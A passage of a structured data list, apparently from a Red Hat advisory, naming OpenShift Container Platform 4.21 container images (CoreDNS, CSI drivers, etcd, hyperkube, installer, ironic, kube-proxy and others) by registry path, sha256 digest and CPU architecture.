"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:26d93d9c3f7d1062352b9a3c8fc310493b82a992fbaee507f2acd89a25af9817_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:37108a8ac0e5f8284600cfaf82464ca52003565a2a2f2c88063b88ca5bf51d96_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:b407d2fd2856dcec89ab84290158a5bd6c137930fc6f50ede20955d7b01c3aa2_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:c8fe680b1a191adfcce2a63df567dbe0c9a8eb29e627d58a396dba2087b8e25d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:5e34c5fe7eb76d49ef6a3d0f51d992027a1eb03d2bb19849101e06f1c5712c0c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:caaa046579e45eb9fd04e0ccaf4626dc996821dd2c285c98f817aafd4ff5699a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:bb5390b5c793399187217ba40659b86e9de4a301fe555c630a41a198d0e36bdb_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:f7826f13f5ddd0da5388b0122164cc20f00f18d5c6e7ded86c600d09e75f23e4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:bf37d0ca7770e6609c5c746e13d5a44c38162f6d5e9892de2aeee29cf152236b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:f3efff725f2e8a8a771f0fd6632819d69335da62c57a6da55b2aba08ec3d08a5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:052ee53314fff6d49caa1b52be80c90f4a81bdfd9b0f27ed6c2a5cf4e260ef33_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1dfaae34d94c83c0980ad92ab74ee4e60b727a7bdb6e671dc5a99b907bb33ddd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:38e460f96e25cf1d13a7092fa9b9aa5f0b61b30217f5ffcabdec78e1fb8215f3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:be1d0b6e6b3d11f0028bd8e17f6fa5f948472ae1664a08ddb27c325137e4c013_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:1b31ce33a1c3710bfc248e76293ed88a8eb9a250b5bd8ec39706bd54d19e3eba_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:34f242c441b8c550a655ac872ae8c9b97ad417e82b7c46b865f93c5b5ec75a42_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:41e352ba9ad323ac14abd8e9f49a942cedb89b0f16b0e21e4773070c46cf01ba_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9bb667960a8f888be2bcee6a24688bb30200990775dce499ad94b0137174609f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:7980c446d0b882444418d1c3dd89be448124b9d58d94a19951c534193e26a242_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:a0e267de6bed29219c427f960712fef9345af738251bcf9d471895d019ec894d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:db5a00fe20fb9b52f0a5e01bd5462d1db5725c4b91354ee38d70fc32f6330191_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:f11375cabff0a8433c9a1af3d097482d48f29a060609a30391fcf1bbd24bf0ce_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:6fa875bee4fc70d30398f87be115e6e3c9574e5cdd469371589d55eff70ab5cf_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:df3604d1255d191a0108b37c87dfb3674e27f1adbc6a1e73df74182b2252f900_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:e1d620dd772b606f22d2d87212bb177c49ff06534e7f6c3c23b63989f7f3d9da_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:f645058a52bda117e49b0dcaddeb6a94d09dc50410cbd1ad976be96d1e1af407_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:153a55ce471731257054208373296f8f46f011cf5919a9619803abcd790c1ade_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:ae8f624c43ae3af3011158c8f646d1055d5042f2b9e0314611c84a6a1eed1bac_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:c250ea4c101b9b0193fcdeffece7e816dd2db1e670af97176e38b2785fa68900_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:dc09c24ed64144c3786b201426b0d796896d5d4ab5c512be8b384863d6f02884_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:595b03c50302148c33de51825571a2b59a1930591d461a717315be05c6efdbb1_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:6dc06ddd4760393cb6737b9c259e41a33065392db9aa772d86da211e17949e16_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:8c949eabc7146e5cf5d7dbe0faa19717bbc6798e8bddc4b387fa8f498697cfa8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:e09166e12e41529af8b4097fd30b3b874d7415e0001f3bad5051a6e2c4962cff_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:60c0c64458e0e76742fc7b6a89a556ae479c0db8696a9ea4e26fcd761c8bcf70_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:6bb20817f634256d50553f735342581d901334968247da8a6a53173d1205f220_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:bbb9cea4afaf999cb15d7c55d31f9825167ba7a9cf7fc9e43e418c7bc5463502_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:c90d130c0e235ccb6395abdf3a0ce0e21fc14de92425b7fd5b517d3d0f9ad1fa_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:7d1370d3d3a2f2f50cffd40783e46a0c830cb7326231de0c620d71c832422fc4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:ad3637958bf538933748f6a7bf3512bf18d01a4082e308dfd7a451639601b320_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:e13bbf95fdfd5a8f1ae64cb7f0c06ea5773d7f133584c4488d4d4b2411b36bbd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:f27fe2d2c41b23c7fc8dc7dd2c442b792583c424c60f72e425dd91a1358c7fd8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:04a546e0d3565c8b6fe8975074b5a4ddf8bb9d2cb76fdc5083d6313e96c4c084_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:1bdf652d7b821aaf84e717f811073cfc347ad45e86b5d6a01f89f68eefe2eb3e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:bfaf7ccaf20cb2c1f4808d0729ee29dd040d1a6affc10c54512637f3f348eff9_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:c6ffe0b9527d2431a8cb3aa16e0f353e5f715278ed48282ac33be339a704bdda_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5199b636240c6bce865db65c585dad4557b45f20dd78c275df7536c17ee5f8c7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:7b8d5213a8ee963f2edde31d4865d0450267d35505467c217a490efc1afe8289_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:e683a2939c279d6b694eca7d8591e66459b880eefe3d5ba3312e2ed90e8337e5_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:ee26deea807e27278f4286dcc3d62a2ac54dcd75e52b20150c943d5556367222_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:4bf941cfba094da6cc387b0b24430b60131c812dfb179e8ca0f57e15b4757434_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:7958abc201949f9faed6fe6cd4f8e2f8dab06dde35f09779cec19e9286f3983d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:b813e2c74a2180534b64eba9e4847ce7799f2c6b36cc91d429d0f3ea7e8d8e6d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:e38a0d0e75270f3acdb47ba5e7f0359ec7de6bfa1cadcc082ab9393cad673990_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:1a4181f0d2ba03e2168f4bf87be3290711b65e96da3998b1315e6d29ed56bb5e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:c17093b12e451052d0b50b93e4f165608cc0f32fa2813c703756c66805e5912b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d618e7ff80f4919d20ed8639c9a61e3db83c500628b22cb92bafc08597c44953_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:f50ed232b96a6a5809867d68ccfd688a03d506c88aab1607bc115553c8ebf3a9_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:4bb9e672922e50ec937868aad492e319d40d7c24a247650f2d39fe2ab5f4c6db_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:605aba5c7d9d19b5505ccef7f194c4842c3fb95de679d1b6644695efff259356_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ec7a31da8937a874a6e5bb866f53f21eae3b174663e2f4e7c6bfceadb6ef9415_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:9f76b703dd3bda6e39fee67990cbf7f18ca3856b51610ecd8e3355e435af9863_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:acd9330cdd75e08c16c5f0e819d4200d353af95fe5943d25b7f4eec4c6f4595f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fde514cea5c59ece8928a6f9248fd58858ee0b3ae6df84281f0a2f00ad2e507f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:062c301cf5f354992055176ee1ba2cfd03748cb1045c1a1819e34ff71c0775b3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:a023bca30051596776daab0263ddb617d2a13dabc46de5c97f123b253fbf3d29_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e940d0365a64e273be01d35537c61be14f5ec1c3e8971ee8a41382861cf35efe_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:0ffaa1a15a78babd7663e94f876629d768f7e7835c3778d96b146b7fb758d0b1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:71be38fcf1f7e316ccc94937d0ebe9799762a8cbc14cadd426342c4cbc47f259_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:82c80097ae5a60ac10a19d486cba96bc72e5b799350e925a459ae0bb37cc22b3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:7fd964ab54bcdea280ba34f98d6d9f7365c4bbda46136e63ee80a19f231e36be_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:854ddefe9f6d6c6a9afa3df8188f96fa05364a28ec6432ad248bcd2e457182a1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:f882bedd7b4e73d9e850a3ffeec653718848cb596ce8bfbbb34a0a7f4a36a680_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:fca3cb9d3e9541e01418795e31ebc918fef89031828d64846c81ab59eb3fb4d2_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:015d764fd216b07543e8c2d0f25aa29f9695e8501c178f0ee3b6759bde5631ce_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:827cfae8caf3dbc109b7a17cad74a55d9a4b2b037be5da6174a4e0fba36de5d0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:afb37a117f3ef2967b8ade392055bd3aadce2a2c19f21eb3b36e39224dc046c7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:e8badf78c7d338c04dc43be33d6de5484c70d2d60388d26b77bbed2ffa2f7071_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:130477ef0652a23921c63297c08c35a8e89a06e02d7be26a6e6cc5e0855a3693_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:18cd11b57cbd5d2a7a277bc8abe8ff6f5f2b663072f9d44994e4093fc986ea39_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b150b48e8f6a937e9d025c72761ac9d2ca82d59d69ce28a36a1108f09250c53b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:c9b03caecf5048cc37952df8194ddb113de62bdb7ebbb8a927a3299e1e3975b6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3990f7f0d2e505ec391fe3056a175d985b5f508642740bcbf8b61fabf6ecda75_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:4cd532032ab58f5d6029ec366d79f46c909db4374fbc26212558e689f7059f07_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:8c9c050549f490f6b96eca68bb61a32f164b2152cae31b4ffb7d7ecc4bd678b1_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:fff15ac26ca10cbbdd23fcf4510a4b2b69c01de3fce1d70ae016933237e8676e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:2625f633345e56a2c008602b6489037488fc9054ff973cae80939ab88cc19d8b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b571a143b03ff7d75ad86bbd890817a644ef5b52de0881e2beb1e8f25c056ecd_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:7cdd19649ef45a859affbcda295276a1c1b356f20be2ba11db57b713ddd432c9_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:eea66c84f7e2f69e9fbefc1b58ec9e544c1b6c3320bb631dbe2240a8737b600d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:d8c47e73a2fd940fc9162adbbd62341086bd61376a830dfa270eeaed7621dc46_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ee3b692430aea38ad28dc9a7cf80a579ca8341d355372852ac7e69b2aaff30e4_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5484533f421052d86a8d6ba388f38f3feb68e7a2e015a7123da87b7b4c7980b6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:7406513da534756c4929f48e1a765a026e129ca0f61d49d415374f8e15c11c5a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:b80d2f4064ca975b20a8111782afce45f005a6ec12a78d8d3f9d544b30bb2a27_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:45eaefe5b35fc9fb7755ea44fca6b12a1ab7e65d933055e98bdf458b6ba5e50d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:c1977cc007191a46853b0a3915c45e9561664d4e06516ef1a04e8562df31420c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:47db252dd861d805da4299bc67982e1472777ae0484edc17c43d6f0bcac74c94_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4ea870b393120ff9a209eb91c1694ab03e340cd92e0bf45574a386bd715ab1af_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:77d16684819289af124e53b26a96c187bc848d23fa00a054fd4253c922e21ac8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:94b8f7046824d7fc258908303d0dd7dea98dffdb71da75473741701d5630fd43_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:a3954de25adc3d89613106ebb867d565ffe356b4febb3b9c1470d46bdd4a8547_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c7fa7dc7e546ef6d5b322e521bdbf86e7be13859167e071839d6164a128b5954_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:303710848cd4644e4235da51f011840fae00d5b30df2f55cad1fe3bb91c0ce41_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:7faae8cecca99097bc78c149ff89aaf22ab736bd159983233c569fb79f59f315_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:df2d51c852854930ef5a93f74c83c11df4e7042bee92bb7c33366f648dbe3b41_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:e176cc10b2b9b4b8659796de90b1680c040f79c0f0403f0ef534652144128f7a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:023d697b90f072bb4c7caab8ff197eaaa38a6c2c77b1c9ce05e569061fb87ce7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:257e4cd3d8aca92de36e31ffefb6e9b286c602a32ae1c3f63e4fc59cbd1e4291_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:d25b4e91c945b9beda5248f7ff1b108d3f334748fb2dfcb9d46be984925f194d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:e979034a8badf7cc5b0091f97e3e8d2e7b4db1e14aa71256974e7ad58324bfc3_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:b973fa55da388a8ed7dc04cb6f84da7e5f2ae1e015300130c44a3ccf7502939d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:c8c48ba4ef25cf37ddfc8608146b64c4d7d881b15bbe42a1d3390bfc9bec1709_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:98c91c5062e8d7e164e71ba67cf154a2e7ebd7de83a65f622c3cefcff573e9e4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e07d700e6f778cf8569cc916351b1eb79ef7abbfb34e556503d276f72a21b0fe_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:82c763564d85a635ca0815947d90786d847855f6759d091818d35cb260b807d3_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:8a558ee0c2898ad2d4af602a4cf7e13d5f4bac6fafc958088ce0af1ad6b23abf_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:128f1ceb7f59758ea0001dbc24659a199a519f077c89c686574d577f9082598b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:ddb73dd86afdfb11fd4d2f2ca9323a72e9ab3030026f3bc48238513a3fab8c75_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:1df147ec39f8163f0d3071c46e0cc2b6bf2e0ca3a72d98cb01337e1e15d3df0b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:43f06bfcf33a143963b6f2f459e2348977d20639165881d3c94fc50504ff589d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:be44136cdbbda20d1628aefa40838aceeb7d0a6009e4e182ea886ae561e5df68_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:cc22af0f83fccd128938409d0d7adc4584b9232d73e9be2f4f57d6189d3a70f8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:27255764d47f35147d02850500d774d54c4216c802d2cfb01c0ab555540a85f3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:40b00fab8ba7620d9ad8884b9609046aa8e08647f4832d60a0b5168adf3cfffa_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:49129f16b6f9dee24e02c0972ebaa059b4a86976d4dc612f129a7f576a8bb01a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:9a37dc47bb380727304270fb8e508f4e2f638ae70a5c90c055d212bf72368488_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:0b449cd4c58e81397bc99ba2d0970585d2a3cc1472a8134b46cf20e8c488b8c5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:18ac01a31557a6a6b97d34d8cae22ffbd27e3f9ec3d5f63e45c78cbf07020044_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:a37e5b31b6b72957a891fc6a9186b33a810109ccbd55e30cfbb4c4eaadb70be4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:ff584bede1ee71be248b0f2070dee6ea3b78050e88b88682c28fc797ac660623_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:145ba54fe931a01cab8cef5d1d1535a1f3b719403b000e2b34256d7ede7ec6f8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:922f2719d99173cc43cc0c575706dfdf0b18d04fbbebfa361f3b8da58c00a5ec_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:92a8781fdc3b5f1db9a5c578b6685dc56093a1d5c273ee3abc6270ee9400387e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:fd42f2dec072128bf5f2838c94a1d7c806c76a040e71150671f97c1d82a0276d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:3d02603962035bdee1a13b1b0d17740cc9c5bcdc89f2372652e5a7dd907ca313_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:7cd0ca58e7ebd7d6f24025a8d3fb64c4026e54490d353af970d0fc0ff51c47a4_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:a5c0bd42f2ffe7c2d87f8c5ecb5910a64bb63bdceac83669cb38b5180907e052_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b98ba3b15b09a6308b2683aa2740c02ca6c552a866845887e2ca6f5aad6c133a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:06a7767e01204923e118d012ee39152119980e1d59db0810aac1ddf27af2abdf_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:0b83daa834cf9df259d8fd475c2678d92c6dd44ed697a96c24ac8921a972b58f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:1379cb01ad37cd0e9485c04dbe8ed2fa8eef5eac26a5c9b12277bda753d80305_amd64",
